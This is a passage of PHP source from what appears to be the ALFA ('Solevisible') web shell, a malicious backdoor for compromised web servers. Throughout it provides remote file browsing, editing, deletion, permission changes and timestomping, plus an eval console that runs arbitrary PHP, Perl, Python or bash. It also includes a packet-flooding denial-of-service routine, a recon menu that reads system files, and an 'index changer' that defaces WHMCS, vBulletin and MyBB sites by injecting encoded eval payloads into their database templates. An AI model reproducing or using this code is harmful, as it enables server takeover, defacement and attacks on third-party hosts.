'..')))continue; }else{$zip->addFile($key,$key);}}}} @chdir($GLOBALS['cwd']); $zip->close(); __alert('>> '.$zipX.' << is created...');}} }elseif($_SESSION['act'] == 'unzip'&&isset($_SESSION['f'])){ if(class_exists('ZipArchive')){ $zip = new ZipArchive(); foreach($_SESSION['f'] as $f) { if($zip->open($_SESSION['c'].$f)){ $zip->extractTo($GLOBALS['cwd']); $zip->close();}}}} unset($_SESSION['f']); break; default: if(!empty($_POST['alfa1'])){ $_SESSION['act'] = @$_POST['alfa1']; $_SESSION['f'] = @$_POST['f']; $_SESSION['c'] = @$_POST['c']; } break; } } if(isset($_SESSION[__LAST_CWD__]) && !isset($_POST['c']) && $_SESSION[__LAST_CWD__] != ''){ $dirContent = @scandir($_SESSION[__LAST_CWD__]); }else{ $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){ $path = explode('/', $res[1]); array_pop($path); $_POST['c'] = implode('/', $path); } $_SESSION[__LAST_CWD__] = str_replace(array("..","//"), array("","/"), $_POST['c']); } $cmd_dir = false; if($dirContent === false){ if(_alfa_can_runCommand(true,true)){ @chdir(dirname($_SERVER["SCRIPT_FILENAME"])); if(!isset($_SESSION["alfachdir_bash"])||@!file_exists("alfacgiapi/getdir.alfa")){ $bash = "jZNvb5swEMZfw6e4eaZppaIk3Z9INLyYNHXq2017UYWocsEEa2AjQ5SxNN99PmMIlTJpEVLOv+fu8Rkf79/N942evwg5bwr/6+P3mC79x4cfMZ0lcubztFBANsTPlQYBQgK9LhsIGYThTqt9HWZC87RVWvAmzIVuWqDG5eYeMuWD+dWsLWKCbE4F8T0hcxXT66ZlLYQpkOAhCn5GwbcoaKLgKVoELAq+EKBYd+N72MosmoHmLINQ485Ma9bBer0GQtHNmLZdzWN6tMpmsT3ZndVBcj3SpaO265HeGeo14s+5+gOSSmUi70b20dXWXFdyX43804QX+4rJUfmMLiKHzcacpK+COAayWK5WKwLb7T20BZe+5w2eZIGKA70ZyfTht30Mz8VgGB7MwfH1oA9cXVmmJ+yNd6pKpWNSMSGfd5pz+YzUGPLS2f1X6aEQLT+XNvxCjubZkHHuluLd2LMPk9K92cheHWqTls41mu/2JdOQi5Lb476+Xk7gVd12/05ruupFlSKFUshfF/a3hX3bduSPCZGs4gmJIDFTlpBb84+pjvQhQjtljroYsR0zh12MGEfN0T5E2E+bw8MCBTcbThlXg2SnZCK69SDbq5nIbn269TMlufu0j6ct+Qs="; alfaWriteTocgiapi("getdir.alfa",$bash); } if(empty($_SESSION[__LAST_CWD__]))$_SESSION[__LAST_CWD__] = "/"; $dirContent = alfaEx("cd alfacgiapi;sh getdir.alfa '".addslashes($_SESSION[__LAST_CWD__])."'"); $dirContent = json_decode($dirContent, true); if(is_array($dirContent)){ array_pop($dirContent); $cmd_dir = true; }else{ $dirContent = false; } $_SESSION["alfachdir_bash"] = true; } } if($dirContent == false){ echo '

!!! Access Denied !!!

'; alfaFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['alfa1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match)) $sort = array($match[1], (int)$match[2]); } echo "
"; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++){ if($cmd_dir){ $filename = $dirContent[$i]["name"]; $file_owner = $dirContent[$i]["owner"]; $file_group = $dirContent[$i]["group"]; $file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]); $file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true); $file_size = $dirContent[$i]["size"]; $file_path = $_SESSION[__LAST_CWD__]."/".$dirContent[$i]["name"]; }else{ $filename = $dirContent[$i]; $ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????"); $gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????"); $file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????"); $file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????"); $file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename)); $file_perm = alfaPermsColor($GLOBALS['cwd'].$filename); $file_size = @filesize($GLOBALS['cwd'].$filename); $file_path = $GLOBALS['cwd'].$filename; } $tmp = array('name' => $filename, 'path' => $file_path, 'modify' => $file_modify, 'perms' => $file_perm, 'size' => $file_size, 'owner' => $file_owner, 'group' => $file_group ); if(!$cmd_dir){ if(@is_file($file_path)) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($file_path)) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($file_path)&& ($filename != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); }else{ if($dirContent[$i]["type"]=="file"){ $files[] = array_merge($tmp, array('type' => 'file')); }else{ if($dirContent[$i]["name"] != "."){ $dirs[] = array_merge($tmp, array('type' => 'dir')); } } } } $GLOBALS['sort'] = $sort; function alfaCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "alfaCmp"); usort($dirs, "alfaCmp"); $files = array_merge($dirs, $files); $l=0; $cc=0; foreach($files as $f){ $f['name'] = htmlspecialchars($f['name']); $newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name']; $checkbox = 'checkbox'.$cc; $raw_name = rawurlencode($f['name']); $icon = $GLOBALS['DB_NAME']['show_icons']?'':''; $style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':''; echo ''; $l = $l?0:1; $cc++; } echo "
NameSizeModifyOwner/GroupPermissionsActions
'.$icon.''.(($f['type']=='file')?alfaSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''. $f['perms'].'R T'.(($f['type']=='file')?' E D':'').' X
"; alfafooter(); } function alfaFilesTools(){ alfahead(); echo '
'; if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']); $alfa1_decoded = $_POST['alfa1']; $chdir_fals = false; if(!@chdir($_POST['c'])){ $chdir_fals = true; $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"]; $alfa_canruncmd = _alfa_can_runCommand(true,true); if($alfa_canruncmd){ $slashed_alfa1 = addslashes($_POST['alfa1']); $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"')); $perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi"); } } if($_POST['alfa2'] == 'auto'){ if(is_array(@getimagesize($_POST['alfa1']))){ $_POST['alfa2'] = 'image'; }else{ $_POST['alfa2'] = 'view'; if($chdir_fals){ if($alfa_canruncmd){ $mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'")); $mimetype = $mime[1]; if(!empty($mimetype)){ if(strstr($mimetype, "image")){ $_POST['alfa2'] = 'image'; } } } } } } if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];} if(@$_POST['alfa2'] == 'mkfile'){ $_POST['alfa1'] = trim($_POST['alfa1']); if($chdir_fals&&$alfa_canruncmd){ if(_alfa_is_writable($_POST["c"])){ alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'"); $_POST['alfa2'] = "edit"; } } if(!@file_exists($_POST['alfa1'])){ $fp = @fopen($_POST['alfa1'], 'w'); if($fp){ $_POST['alfa2'] = "edit"; fclose($fp); } }else{ $_POST['alfa2'] = "edit"; } } if(!_alfa_file_exists(@$_POST['alfa1'])){ echo __pre()."

!...FILE DOEST NOT EXITS...!

"; alfaFooter(); return; } if($chdir_fals){ $filesize = $file_info[3]; $uid["name"] = $file_info[1]; $gid["name"] = $file_info[2]; $permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true); }else{ $uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):''; $gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):''; if(!$uid&&!$gid){ $uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):''; $gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):''; } $permcolor = alfaPermsColor($_POST['alfa1']); $filesize = @filesize($_POST['alfa1']); if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){ if(_alfa_can_runCommand()){ list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"')); } } } echo 'Name: '.htmlspecialchars($alfa1_decoded).' Size: '.alfaSize($filesize).' Permission: '.$permcolor.' Owner/Group: '.$uid['name'].'/'.$gid['name'].' Directory: '.str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']).'

'; if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view'; if(!_alfa_is_dir($_POST['alfa1'])){ $m = array('View', 'Edit', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump'); $ftype = "file"; }else{ $m = array('Chmod', 'Rename', 'Touch'); $ftype = "dir"; } foreach($m as $v) echo $v == 'Delete' ? ''.((strtolower($v)==@$_POST['alfa2'])?' '.$v.' ':$v).' | ' : ''.((strtolower($v)==@$_POST['alfa2'])?' '.$v.' ':$v).' | '; echo '

'; switch($_POST['alfa2']){ case 'view': @chdir($_POST['c']); echo '

';
echo htmlspecialchars(__read_file($_POST['alfa1']));
echo '
'; break; case 'highlight': @chdir($_POST['c']); if(@is_readable($_POST['alfa1'])){ echo '
'; $code = @highlight_file($_POST['alfa1'],true); echo str_replace(array(''), array(''),$code).'
'; } break; case 'delete': @chdir($_POST['c']); if(@is_writable($_POST['alfa1'])||isset($GLOBALS["glob_chdir_false"])){ $deleted = true; if(!@unlink($_POST['alfa1'])){ $deleted = false; if($alfa_canruncmd){ if(_alfa_is_writable($_POST['alfa1'])){ alfaEx("rm -f '".addslashes($_POST['alfa1'])."'"); $deleted = true; } } } if($deleted)echo 'File Deleted...';else echo 'Error...';} break; case 'chmod': @chdir($_POST['c']); if(!empty($_POST['alfa3'])){ $perms = 0; for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i) $perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1)); if(!@chmod($_POST['alfa1'], $perms)){ if($chdir_fals&&$alfa_canruncmd){ alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'"); echo('Success!'); }else{ echo 'Can\'t set permissions!
';} }else{echo('Success!');} } clearstatcache(); AlfaNum(8,9,10,7,6,5,4,2,1); if($chdir_fals){ $file_perm = $file_info[5]; }else{ $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4); } echo '
'; break; case 'edit': @chdir($_POST['c']); if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){ echo 'File isn\'t writeable'; break; } if(!empty($_POST['alfa3'])){ $_POST['alfa3'] = substr($_POST['alfa3'],1); $time = @filemtime($_POST['alfa1']); $fp = @__write_file($_POST['alfa1'],$_POST['alfa3']); if($chdir_fals&&$alfa_canruncmd){ $rname = $alfa1_decoded; $randname = $rname.rand(111,9999); $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname; if($fp = @__write_file($filepath ,$_POST['alfa3'])){ alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'"); } } if($fp){ echo 'Saved!
'; @touch($_POST['alfa1'],$time,$time); } } echo '

'; break; case 'hexdump': @chdir($_POST['c']); $c = __read_file($_POST['alfa1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= "\n"; } } echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; break; case 'rename': @chdir($_POST['c']); $alfa1_escape = addslashes($_POST["alfa1"]); $alfa3_escape = addslashes($_POST["alfa3"]); if(!empty($_POST['alfa3'])){ $cmd_rename = false; if($chdir_fals&&$alfa_canruncmd){ if(_alfa_is_writable($_POST['alfa1'])){ $alfa1_escape = addslashes($alfa1_decoded); alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'"); }else{ $cmd_rename = true; } }else{ $alfa1_escape = addslashes($_POST["alfa1"]); } if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){ echo 'Can\'t rename!
';}else{echo('Renamed!');$alfa1_escape = $alfa3_escape;} } echo '
'; break; case 'touch': @chdir($_POST['c']); if( !empty($_POST['alfa3']) ) { $time = strtotime($_POST['alfa3']); if($time){ $touched = false; if($chdir_fals&&$alfa_canruncmd){ alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'"); $touched = true; } if(!@touch($_POST['alfa1'],$time,$time)&&!$touched) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '
'; break; case 'image': @chdir($_POST['c']); echo('
'); $file = $_POST['alfa1']; $image_info = @getimagesize($file); if(is_array($image_info)||$chdir_fals){ $width = (int)$image_info[0]; $height = (int)$image_info[1]; if($chdir_fals&&$alfa_canruncmd){ $source = alfaEx("cat '".addslashes($file)."' | base64"); list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'")); $mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'")); $image_info['mime'] = $mime[1]; }else{ $source = __ZW5jb2Rlcg(__read_file($file, false)); } $image_info_h = "Image type = [ ".$image_info['mime']." ]
Image Size = [ ".$width." x ".$height." ]
"; if($width > 800){$width = 800;} echo $content = "
".$image_info_h."
".$file."

"; } break; } echo ''; alfaFooter(); } function findicon($file,$type){ $s = 'http://solevisible.com/icons/'; $types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm'); if($type!='file'){ return ($file=='..'?$s.'back.png':$s.'folder.png'); }else{ $ext = explode('.',$file); $ext = end($ext); $ext = strtolower($ext); return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png'); } } function alfadlfile(){ if(isset($_POST['c'],$_POST['file'])){ $basename = rawurldecode(basename($_POST['file'])); $_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename); $alfa_canruncmd = _alfa_can_runCommand(true,true); if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){ ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\""); header("Content-Type: application/octet-stream"); if(isset($GLOBALS["glob_chdir_false"])){ $randname = $basename.rand(111,9999); $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]); $filepath = $scriptpath."/".$randname; if(_alfa_is_writable($scriptpath)){ alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'"); readfile($filepath); @unlink($filepath); }else{ alfaEx("cat '".addslashes($_POST["file"])."'"); } }else{ readfile($_POST['file']); } }else echo('Error...!');}} function alfaphpeval(){ alfahead(); if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){ echo '
'; ob_start(); $INI=ini_get_all(); print '' .'' .'' .'' .''; foreach ($INI as $param => $values) print "\n".'' .'' .'' .'' .''; $tmp = ob_get_clean(); $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); echo str_replace('
'; } if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) { echo '
'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); echo str_replace('
'; } if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) { echo '
'; ob_start(); $EXT=get_loaded_extensions(); echo '
ParamGlobal valueLocal ValueAccess
'.$param.''.$values['global_value'].' '.$values['local_value'].' '.$values['access'].'
'."\n".'
'.implode('
', $EXT).'
'.count($EXT).' extensions loaded'; echo '

'; } $lang_html = ""; foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '';} echo '
| INI_INFO | | phpinfo | | extensions |

Select Language:


'; echo '
';
if(!empty($_POST['alfa1'])){
if($_POST['alfa3']=="php"){
ob_start();
eval($_POST['alfa1']);
$result = htmlspecialchars(ob_get_clean());
}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){
	if(isset($_SESSION["eval_tmpdir"])){
		$tempdir = $_SESSION["eval_tmpdir"];
	}else{
		$tempdir = dirname(alfaEx("mktemp"));
		$_SESSION["eval_tmpdir"] = $tempdir;
	}
	$lang = $_POST['alfa3'];
	$filename = "temp".rand(11111,99999);
	$temp = $tempdir."/".$filename ;
	__write_file($filename, $_POST['alfa1']);
	$result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
	@unlink($filename);
	@unlink($temp);
}
echo '';
}
echo '
'; alfafooter(); } function alfahash(){ if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i '__ZW5jb2Rlcg($s)', 'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)', 'strrev ( $string )' => 'strrev($s)', 'bin2hex ( $string )' => 'bin2hex($s)', 'hex2bin ( $string )' => 'hex2bin($s)', 'md5 ( $string )' => 'md5($s)', 'sha1 ( $string )' => 'sha1($s)', 'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)', 'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)', 'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)', 'crypt ( $string )' => 'crypt($s)', 'crc32 ( $string )' => 'crc32($s)', 'str_rot13 ( $string )' => 'str_rot13($s)', 'urlencode ( $string )' => 'urlencode($s)', 'urldecode ( $string )' => 'urldecode($s)', 'full_urlencode ( $string )' => 'full_urlencode($s)', 'htmlspecialchars ( $string )' => 'htmlspecialchars($s)', 'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))', 'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))', 'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))', 'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))', 'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))', 'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))', ); alfahead(); echo '
'; echo "
Method:

"; if(!empty($_POST['alfa1'])){ $string = addslashes($_POST['alfa2']); $string = str_replace('\"','"',$string); $alg = $_POST['alfa1']; $code = str_replace('$s',"'".$string."'",$alg); ob_start(); eval('echo '.$code.';'); $res = ob_get_contents(); ob_end_clean(); if(in_array($alg, $stringTools))echo ''; } echo "
"; alfaFooter(); } function alfados(){ alfahead(); echo '
'; echo '

| DOS |

Method : Host : Time : Port :

'; if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){ echo __pre(); $packets=0; ignore_user_abort(true); $exec_time=(int)$_POST['alfa2']; $time=time(); $max_time=$exec_time+$time; $host=$_POST['alfa1']; $port=(int)$_POST['alfa3']; $method=$_POST['alfa4']; $out = str_repeat('X',65000); while(1){ $packets++; if(time() > $max_time){ break; } $fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "
$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second
"; echo "
"; } echo ''; alfafooter(); } function __pre(){return('
');}
function alfaIndexChanger(){
alfahead();

echo '

| Index Changer |

| Whmcs | | vBulletin | | MyBB |

'; if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){ echo __pre(); echo "
| Whmcs |

".getConfigHtml('whmcs')."
"; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50') ); create_table($table); echo "
| Your Index |


"; if(isset($_POST['alfa6'])){ $s0levisible="Powered By Solevisible"; $dbu = $_POST['alfa6']; $path = $_POST['alfa5']; $fname = $_POST['alfa4']; $dbn = $_POST['alfa7']; $dbp = $_POST['alfa8']; $dbh = $_POST['alfa9']; $index = $_POST['alfa10']; $index = str_replace("\'","'",$index); $deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);'; $saveData = __ZW5jb2Rlcg($deface); $Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}'; if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){ $conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn)); $soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'"); $soleGet = mysqli_fetch_assoc($soleSave); $tempSave1 = $soleGet['message']; $tempSave = str_replace("'","\'",$tempSave1); $inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'"; $result=@mysqli_query($conn,$inject) or die (mysqli_error($conn)); $create = "insert into tblclients (email) values('solevisible@fbi.gov')"; $result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn)); if(function_exists('curl_version')){ $AlfaSole = new AlfaCURL(true); $saveurl = $AlfaSole->Send($path."/pwreset.php"); $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token); $AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov"); $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'"; $Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn)); __alert('File Created...'); echo "

Click Here !


"; }else{ echo "

Please go to Target \" ".$path."/pwreset.php \"
and reset password with email => solevisible@fbi.gov
and go to \" ".$path."/".$fname." \"


"; }}}} if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){ echo __pre(); echo "
| vBulletin |

".getConfigHtml('vb')."
>'); return false;\"> "; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50') ); create_table($table); echo "
| Your Index |


"; if($_POST['alfa8']=='>>'){ $s0levisible="Powered By Solevisible"; $dbu = $_POST['alfa2']; $dbn = $_POST['alfa3']; $dbp = $_POST['alfa4']; $dbh = $_POST['alfa5']; $index = $_POST['alfa6']; $prefix = $_POST['alfa7']; $index=str_replace("\'","'",$index); $set_index = "{\${eval(base64_decode(\'"; $set_index .= __ZW5jb2Rlcg("echo \"$index\";"); $set_index .= "\'))}}{\${exit()}}"; if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){ $conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn)); $loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'"; $loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'"; $loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''"; @mysqli_query($conn,$loli1) or die (mysqli_error($conn)); @mysqli_query($conn,$loli2) or die (mysqli_error($conn)); @mysqli_query($conn,$loli3) or die (mysqli_error($conn)); __alert('VB index changed...!'); } } } if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) { echo __pre(); echo "
| Mybb |

".getConfigHtml('mybb')."
"; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50') ); create_table($table); echo "
| Your Index |

"; if(isset($_POST['alfa6'])){ $mybb_dbh = $_POST['alfa6']; $mybb_dbu = $_POST['alfa7']; $mybb_dbn = $_POST['alfa8']; $mybb_dbp = $_POST['alfa9']; $mybb_index = $_POST['alfa10']; if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){ $conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn)); $prefix="mybb_"; $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'"; $result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn)); __alert('MyBB index changed...!'); } } } echo "
"; alfafooter(); } function alfaproc() { alfahead(); echo "

"; if(empty($_POST['ajax'])&&!empty($_POST['alfa1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; if($GLOBALS['sys']=="win"){ $process=array( "Task List" =>"tasklist /V", "System Info" =>"systeminfo", "Active Connections" => "netstat -an", "Running Services" => "net start", "User Accounts" => "net user", "Show Computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );}else{ $process=array( "Process status" => "ps aux", "Syslog" =>"cat /etc/syslog.conf", "Resolv" => "cat /etc/resolv.conf", "Hosts" =>"cat /etc/hosts", "Cpuinfo"=>"cat /proc/cpuinfo", "Version"=>"cat /proc/version", "Sbin"=>"ls -al /usr/sbin", "Interrupts"=>"cat /proc/interrupts", "lsattr"=>"lsattr -va", "Uptime"=>"uptime", "Fstab" =>"cat /etc/fstab" );} foreach($process as $n => $link){ echo ' | '.$n.' | '; } echo "

